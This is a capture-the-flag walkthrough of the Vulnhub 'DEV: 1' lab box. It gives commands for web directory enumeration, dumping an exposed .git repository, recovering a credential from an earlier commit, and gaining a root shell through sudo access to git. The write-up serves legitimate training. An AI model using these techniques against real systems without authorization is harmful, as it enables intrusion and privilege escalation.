Vulnhub - DEV: 1
Easy level Linux box.
This box “dev” aims to educate people on common and misconfigurations of a widely used developer tool.
Use a good wordlist!
This is DEV: 1 from vulnhub.
We have two ports only, SSH and HTTP on the standard port 80.
We’ve got a hint that we’re looking for a development tool and we need a decent wordlist. I run gobuster with a big list:
root@kali:/opt/vulnhub/dev# gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
And it turns up a /wwwdev directory. Within that is our target, .git.
I use git sometimes so I am somewhat familiar with it; however I saw IPPSEC use a nice tool called git-dumper which I have never used before. I decided to give it a try. I clone the repo into /opt/git-dumper and run:
root@kali:/opt/vulnhub/dev# /opt/gitdumper/ repo
It works perfectly. Checking git log we see:
root@kali:/opt/vulnhub/dev/repo# git log
commit 8072e242fdc09129cac94c569f6cc5ee0aef8059 (HEAD -> main, origin/main)
Author: User [email protected]
Date: Mon Oct 12 23:44:09 2020 +0100
updated: removed file
commit f9e2a3675f4b2f2196276fd11cac9d210a2fc737
Author: User [email protected]
Date: Mon Oct 12 23:43:00 2020 +0100
First commit :)
So we only have two commits, and the second one removed a file. Let’s check the first one:
root@kali:/opt/vulnhub/dev/repo# git checkout f9e2a3675f4b2f2196276fd11cac9d210a2fc737
Once we’ve done that we have a file called cred with the contents:
D1yceX0jgixhk (slime)
This is a vignere cipher encoded password with the key slime; it decodes to:
With this, we can SSH in as f3dai (our git user from above).
Once we’re in as f3dai, we find out he can run git as root with sudo, which is a nice touch. GTFOBins shows how we can take advantage of that:
f3dai@dev:~$ sudo -l
Matching Defaults entries for f3dai on dev:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User f3dai may run the following commands on dev:
(root) NOPASSWD: /usr/bin/git
f3dai@dev:~$ sudo -u root /usr/bin/git -p help config
// then
# cd /root
# ls
# cat root.txt
This wasn’t overly complicated and didn’t take too long but I enjoyed it; thanks f3da1.
A parting note
I also completed Praying: 1 from Vulnhub but I’m not going to write it up as a separate entry. Foothold was via a PHP webapp called Mantis with an unauthenticated RCE vulnerability, then we escalated through three users by finding their credentials, and then privesc was the same as Funbox next level with dd.